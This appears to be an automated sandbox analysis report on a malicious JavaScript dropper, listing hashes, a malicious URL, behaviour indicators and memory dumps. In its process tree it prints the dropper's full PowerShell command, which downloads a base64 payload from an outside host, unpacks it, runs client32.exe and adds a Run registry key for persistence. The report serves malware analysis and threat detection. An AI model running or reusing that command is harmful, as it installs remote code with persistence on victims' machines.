08e4dadf294dad1072e37c8979e394055ce176c940e36f47895c2929efb24125

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
29/08/2023, 08:27

Target

232123212321.js
Size

3KB
MD5

55b69c07b1ba60eb1dd5f602a503c8a8
SHA1

f52c545c39628c813234d509a6a52decdf320464
SHA256

08e4dadf294dad1072e37c8979e394055ce176c940e36f47895c2929efb24125
SHA512

2f30c9cac5d4e0de019fd03e4cee935baf5d1d048923215d5a53e96028a675c4ddcf0f3e3e9ad8942d0c2118fc5659f23b9b20295e00185af73c1fe6ef576673

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://instalfrio.cl/destination.txt

exe.dropper

http://instalfrio.cl/destination.txt

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2124	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2124	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2124	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 2124	1516	wscript.exe	28
PID 1516 wrote to memory of 2124	1516	wscript.exe	28
PID 1516 wrote to memory of 2124	1516	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\232123212321.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2124

memory/2124-4-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2124-5-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2124-6-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2124-7-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-8-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-9-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-10-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2124-11-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2124-12-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-13-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-14-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-15-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2124-16-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download